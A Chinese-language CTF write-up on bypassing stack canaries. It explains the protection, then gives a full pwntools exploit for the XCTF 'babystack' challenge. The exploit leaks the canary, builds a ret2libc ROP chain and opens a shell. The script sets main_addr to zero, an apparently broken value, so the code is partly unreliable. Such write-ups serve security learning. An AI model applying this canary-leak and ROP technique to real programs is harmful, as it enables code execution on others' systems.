之前做题没做过canary类型,今天补知识盲点遇到canary,恰好也写一篇吧。
学pwn时基本会遇到几种保护类型,如RELRO,PIE,NX,还有Canary,这里解释一下canary。
栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。
一大段子很烦,看图:32位情况下栈图,左边是正常的,右边是开了canary保护的情况。
进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。
来道例题看看如何激活成功教程,常见一种方法就是puts出canary,我们得到他之后在原来的栈溢出上再加个canary就可以绕过了。
看一下攻防世界进阶区的pwn1。
打开checksec,开的很全,除了pie开全乎了。
打开ida
逻辑很简单,自己打开读一下就行了。
主要看一下真实的canary长啥样 。
这是main函数
f5下显示是 v6 = __readfsqword(0x28u); 汇编下 mov rax, fs:28h mov [rbp+var_8], rax再看一下main结束时发生什么
看一下jz判断哪里,如果不相等就挑一个 stack check fail的函数
这下算是彻底清晰了
fs:xx中。FS寄存器指向当前活动线程的TEB结构(线程结构)
理论上来说,对于我们就是随机的,所以我们像绕过去栈溢出,一般是老老实实把canary得到。
canary还有一个特点,第一个字符为’\x00’,目的就是为了截断防止泄露出来canary。我们可以将其’\x00’覆盖为一个非零的值。这样就可以打印出canary了。该题利用的就是这一思路。
得到canary后的操作还是ret2libc的常规操作
exp如下:
from pwn import * from LibcSearcher import * p = remote('111.200.241.244',59735) elf = ELF("./babystack") puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main_addr = 0x0000000000 pop_rdi = 0x0000000000400a93 p.sendlineafter('>> ','1') payload = b'a' * (0x90 - 8) p.sendline(payload) # 等价于p.send('a' * 0x88 + '\n') p.sendlineafter('>> ','2') p.recvuntil('aaaa\n') canary = u64(p.recv(7).rjust(8,b'\x00')) payload1 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr) p.sendlineafter('>> ',b'1') p.send(payload1) p.sendlineafter('>> ',b'3') puts_addr = u64(p.recv(6).ljust(8,b'\x00')) log.success("puts_addr +: " + hex(puts_addr) ) libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') system = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') p.sendlineafter('>> ','1') payload2 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(binsh) + p64(system) p.send(payload2) p.sendlineafter('>> ','3') p.interactive()其中注释那个等价我再带一嘴,read函数在读取时类似gets,会把空格也算入,除此以外还会把最后的换行符算入,也就是\n。(小声嘀咕:(第一次分清换行符和回车符,那个u64是咋算开头的空字符的,知识盲区了属于是)
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/231347.html原文链接:https://javaforall.net
